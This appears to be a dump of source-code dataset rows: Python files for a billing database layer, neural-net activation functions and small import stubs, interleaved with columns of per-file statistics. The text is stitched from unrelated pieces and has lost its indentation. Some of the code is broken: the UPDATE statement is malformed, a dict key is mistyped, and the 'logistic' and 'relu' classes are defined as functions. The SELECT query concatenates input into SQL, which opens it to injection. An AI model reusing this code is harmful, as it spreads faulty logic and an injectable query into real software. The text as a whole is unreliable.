chuoiSQL = "select ID, product_id,unit_id,product_nameHOA,unit_code,amount,unit_price,sub_total,tax,tax_amount,note,bill_id from bill_detail where bill_id = "+ID_PX+""
cursor = Database.getALL(self,chuoiSQL)
if cursor != None:
recordList = []
for row in cursor:
TT = {'ID':row[0], 'product_id':row[1],'unit_id':row[2],'product_nameHOA':row[3],'unit_code':row[4],'amount':row[5],'unit_price':row[6],'sub_total':row[7],'tax':row[8],'tax_amount':row[9],'note':row[10],',bill_id':row[11]}
recordList.append(TT)
return recordList
def Insert(self,product_id,unit_id,product_nameHOA,unit_code,amount,unit_price,sub_total,tax,tax_amount,note,bill_id):
chuoiSQL = "insert into bill_detail (product_id,unit_id,product_nameHOA,unit_code,amount,unit_price,sub_total,tax,tax_amount,note,bill_id) values(?,?,?,?,?,?,?,?,?,?,?)"
kq = Database.execute(self,chuoiSQL,(product_id,unit_id,product_nameHOA,unit_code,amount,unit_price,sub_total,tax,tax_amount,note,bill_id))
return kq
def Update(self,Id, product_id,unit_id,product_nameHOA,unit_code,amount,unit_price,sub_total,tax,tax_amount,note,bill_id):
chuoiSQL = "update bill_detail set product_id,unit_id,product_nameHOA,unit_code,amount,unit_price,sub_total,tax,tax_amount,note,bill_id where ID = ?"
kq = Database.execute(self,chuoiSQL,(product_id,unit_id,product_nameHOA,unit_code,amount,unit_price,sub_total,tax,tax_amount,note,bill_id,Id))
return kq
def Delete(self,Id):
chuoiSQL = "delete from bill_detail where ID = ? "
kq = Database.execute(self,chuoiSQL,(Id,))
return kq
| 58.756098 | 238 | 0.681196 | 364 | 2,409 | 4.266484 | 0.159341 | 0.063748 | 0.066967 | 0.07727 | 0.848036 | 0.848036 | 0.848036 | 0.820348 | 0.820348 | 0.820348 | 0 | 0.013979 | 0.168535 | 2,409 | 40 | 239 | 60.225 | 0.761358 | 0 | 0 | 0.53125 | 0 | 0.125 | 0.327522 | 0.178912 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15625 | false | 0 | 0.03125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a39e45c8d8347d2596f2983b4f2674b29848a07e | 29 | py | Python | model/__init__.py | ivanwhaf/faster-rcnn-pytorch | 332483019dff5f14014508bea4b79b6d0c9c2f43 | [
"MIT"
] | null | null | null | model/__init__.py | ivanwhaf/faster-rcnn-pytorch | 332483019dff5f14014508bea4b79b6d0c9c2f43 | [
"MIT"
] | null | null | null | model/__init__.py | ivanwhaf/faster-rcnn-pytorch | 332483019dff5f14014508bea4b79b6d0c9c2f43 | [
"MIT"
] | null | null | null | from .model import FasterRCNN | 29 | 29 | 0.862069 | 4 | 29 | 6.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 29 | 1 | 29 | 29 | 0.961538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6eb833871341bbe1725084d9b5a2deb675bf0165 | 209 | py | Python | tccli/services/live/__init__.py | hapsyou/tencentcloud-cli-intl-en | fa8ba71164484f9a2be4b983080a1de08606c0b0 | [
"Apache-2.0"
] | null | null | null | tccli/services/live/__init__.py | hapsyou/tencentcloud-cli-intl-en | fa8ba71164484f9a2be4b983080a1de08606c0b0 | [
"Apache-2.0"
] | null | null | null | tccli/services/live/__init__.py | hapsyou/tencentcloud-cli-intl-en | fa8ba71164484f9a2be4b983080a1de08606c0b0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from tccli.services.live.live_client import register_arg
from tccli.services.live.live_client import get_actions_info
from tccli.services.live.live_client import AVAILABLE_VERSION_LIST
| 41.8 | 66 | 0.832536 | 32 | 209 | 5.1875 | 0.53125 | 0.162651 | 0.307229 | 0.379518 | 0.668675 | 0.668675 | 0.668675 | 0 | 0 | 0 | 0 | 0.005208 | 0.08134 | 209 | 4 | 67 | 52.25 | 0.859375 | 0.100478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6eeb36f004f5ebc4b746a48e3b1b8c1053ee6c06 | 625 | py | Python | nn_framework/activation.py | brohrer/nn_framework | 73cc78a316ca2a1126d25c057ce50b77030b2554 | [
"MIT"
] | 17 | 2019-07-13T01:21:26.000Z | 2022-02-06T14:20:17.000Z | nn_framework/activation.py | brohrer/nn_framework | 73cc78a316ca2a1126d25c057ce50b77030b2554 | [
"MIT"
] | null | null | null | nn_framework/activation.py | brohrer/nn_framework | 73cc78a316ca2a1126d25c057ce50b77030b2554 | [
"MIT"
] | 10 | 2019-10-13T09:17:56.000Z | 2022-01-10T09:19:24.000Z | import numpy as np
# All of these need to be able to handle 2D numpy arrays as inputs.
class tanh(object):
@staticmethod
def calc(v):
return np.tanh(v)
@staticmethod
def calc_d(v):
return 1 - np.tanh(v) ** 2
def logistic(v):
@staticmethod
def calc(v):
return 1 / (1 + np.exp(-v))
@staticmethod
def calc_d(v):
return calc(v) * (1 - calc(v))
def relu(v):
@staticmethod
def calc(v):
return np.maximum(0, v)
@staticmethod
def calc_d(v):
derivative = 0
if v > 0:
derivative = 1
return derivative
| 16.891892 | 67 | 0.552 | 90 | 625 | 3.8 | 0.366667 | 0.263158 | 0.333333 | 0.292398 | 0.473684 | 0.473684 | 0.163743 | 0 | 0 | 0 | 0 | 0.024213 | 0.3392 | 625 | 36 | 68 | 17.361111 | 0.803874 | 0.104 | 0 | 0.48 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.32 | false | 0 | 0.04 | 0.2 | 0.64 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
42cb4325951ee647a9d45ee46c2eb6cc5092aac2 | 21 | py | Python | sandbox/sandbox.py | dgketchum/MT_Rsense | 072238fbca19f2887e29c1a48111d817e47243a3 | [
"Apache-2.0"
] | 5 | 2019-10-16T13:09:49.000Z | 2022-03-31T18:23:51.000Z | sandbox/sandbox.py | dgketchum/MT_Rsense | 072238fbca19f2887e29c1a48111d817e47243a3 | [
"Apache-2.0"
] | null | null | null | sandbox/sandbox.py | dgketchum/MT_Rsense | 072238fbca19f2887e29c1a48111d817e47243a3 | [
"Apache-2.0"
] | 1 | 2022-03-18T17:02:03.000Z | 2022-03-18T17:02:03.000Z | import ogr
import os
| 7 | 10 | 0.809524 | 4 | 21 | 4.25 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 21 | 2 | 11 | 10.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.